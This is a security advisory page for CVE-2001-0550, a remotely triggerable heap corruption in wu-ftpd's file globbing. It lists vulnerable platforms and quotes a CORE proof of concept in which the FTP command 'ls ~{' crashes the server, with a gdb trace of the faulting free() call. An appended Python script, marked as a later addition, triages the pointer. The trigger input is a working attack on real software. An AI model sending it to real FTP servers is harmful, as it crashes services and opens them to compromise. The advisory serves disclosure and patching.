Title: Wu-Ftpd File Globbing Heap Corruption Vulnerability
Published: 2001-11-27 12:00AM
Updated: 2002-02-14 10:56PM
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2001-0550
Remote: Yes
Local: No
Credit: Condition first reported by Matt Power. Exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core Security Technologies, Buenos Aires, Argentina.
Vulnerable: Washington University wuftpd 2.6.1
Caldera OpenLinux 2.3
Caldera OpenLinux Server 3.1
Cobalt Qube 1.0
Conectiva Linux 6.0
Conectiva Linux 7.0
Conectiva Linux 8.0
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.3 RELEASE
FreeBSD FreeBSD 4.3 STABLE
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 5.0 alpha
MandrakeSoft Corporate Server 1.0.1
MandrakeSoft Linux Mandrake 6.0
MandrakeSoft Linux Mandrake 6.1
MandrakeSoft Linux Mandrake 7.0
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.2
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 i586
RedHat Linux 7.1 i686
RedHat Linux 7.1 ia64
RedHat Linux 7.1 noarch
RedHat Linux 7.2 alpha
RedHat Linux 7.2 athlon
RedHat Linux 7.2 i386
RedHat Linux 7.2 i586
RedHat Linux 7.2 i686
RedHat Linux 7.2 ia64
RedHat Linux 7.2 noarch
S.u.S.E. Linux 7.0
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.3
SCO eDesktop 2.4
SCO eServer 2.3.1
SCO Open Server 5.0
SCO Open Server 5.0.1
SCO Open Server 5.0.2
SCO Open Server 5.0.3
SCO Open Server 5.0.4
SCO Open Server 5.0.5
SCO Open Server 5.0.6
SCO Open Server 5.0.6 a
Slackware Linux 7.0
Slackware Linux 7.1
Slackware Linux 8.0
Turbolinux Turbolinux 6.0
Turbolinux Turbolinux 6.0.1
Turbolinux Turbolinux 6.0.2
Turbolinux Turbolinux 6.0.3
Turbolinux Turbolinux 6.0.4
Turbolinux Turbolinux 6.0.5
Turbolinux Turbolinux Workstation 6.1
Wirex Immunix OS 7
Wirex Immunix OS 7.0
Wirex Immunix OS 7.0 Beta
Washington University wuftpd 2.6.0
Cobalt Qube 1.0
Conectiva Linux 4.0
Conectiva Linux 4.0 es
Conectiva Linux 4.1
Conectiva Linux 4.2
Conectiva Linux 5.0
Conectiva Linux 5.1
Debian Linux 2.2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.3 RELEASE
FreeBSD FreeBSD 4.3 STABLE
FreeBSD FreeBSD 4.4
HP HPUX 11.0
HP HPUX 11.11
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.1 alpha
RedHat Linux 6.1 i386
RedHat Linux 6.1 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.1 alpha
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
Turbolinux Turbolinux 4.0
Wirex Immunix OS 6.2
Washington University wuftpd 2.5.0
Caldera OpenLinux 2.4
Caldera OpenLinux Desktop 2.3
RedHat Linux 6.0
RedHat Linux 6.0 alpha
RedHat Linux 6.0 sparc
SCO eDesktop 2.4
SCO eServer 2.3
SCO eServer 2.3.1
David Madore ftpdBSD 0.3.3
David Madore ftpdBSD 0.3.2
Not Vulnerable: Washington University wu-ftpd 2.6.2
Compaq Tru64 4.0 b
Compaq Tru64 4.0 d
Compaq Tru64 4.0 d PK9 (BL17)
Compaq Tru64 4.0 e
Compaq Tru64 4.0 f
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 5.0
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 f
Compaq Tru64 5.1
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK4 (BL21)
Compaq Tru64 5.1 a PK5 (BL23)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b PK2 (BL22)
Conectiva Linux 9.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia-32
Debian Linux 3.0 ia-64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
SCO Open Server 5.0.6
SCO Open Server 5.0.6 a
SCO Open Server 5.0.7
Sun Linux 5.0.7
Turbolinux Turbolinux Advanced Server 6.0
Turbolinux Turbolinux Server 6.1
Turbolinux Turbolinux Workstation 6.0
SGI IRIX 6.5
Code: As of February 5, 2002, reports from credible sources indicate the availability and use of a working exploit for this vulnerability. This increases the likelihood of exploitation by a malicious party.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following (from the CORE advisory) demonstrates the existence of this vulnerability:

ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
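
Reading the last frame of the gdb session above: an added triage sketch (not part of the CORE advisory or of this page's original text) that decodes the pointer handed to free() and checks whether its bytes are printable text that also appears in the ftpd process title. The function names are hypothetical; the two input strings are copied from the session, and 4-byte little-endian pointers are assumed because the libraries load from /lib/i686.

```python
import re
import string

# Copied from the session above; i386 is assumed (4-byte little-endian pointers).
PS_LINE = "26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
GDB_FRAME = "__libc_free (mem=0x61616161) at malloc.c:3136"

FRAME_RE = re.compile(
    r"^(?:#\d+\s+)?(?:0x[0-9a-f]+ in )?(?P<func>\w+) \((?P<args>[^)]*)\)")
# Printable ASCII without control whitespace (space itself is kept).
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def parse_frame(line):
    """Return (function, {arg: int}) for a gdb frame line; non-numeric args are skipped."""
    m = FRAME_RE.match(line.strip())
    if not m:
        raise ValueError("not a gdb frame line: %r" % line)
    args = {}
    for part in m.group("args").split(","):
        name, _, value = part.strip().partition("=")
        try:
            number = int(value, 0)
        except ValueError:
            continue  # empty argument list, strings, structs
        if number >= 0:
            args[name] = number
    return m.group("func"), args


def triage_pointer(value, context, width=4):
    """Describe a faulting pointer: is it really text, and was that text supplied as input?"""
    size = max(width, (value.bit_length() + 7) // 8)
    raw = value.to_bytes(size, "little")
    printable = all(b in PRINTABLE for b in raw)
    text = raw.decode("ascii") if printable else None
    return {
        "bytes": raw,
        "printable": printable,               # address made only of ASCII text
        "single_byte_fill": len(set(raw)) == 1,
        "seen_in_context": bool(text) and text in context,
    }


def analyse(frame_line, context):
    """Triage every numeric argument of the faulting frame against the context string."""
    func, args = parse_frame(frame_line)
    return func, {name: triage_pointer(v, context) for name, v in args.items()}


if __name__ == "__main__":
    print(analyse(GDB_FRAME, PS_LINE))
```

For the session above the report marks `mem` as printable, single-byte fill and present in the process title: free() was given the bytes "aaaa" from the client-supplied string rather than a heap address, which is what makes the crash heap corruption and not a plain null dereference.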
Copyright 2007, SecurityDot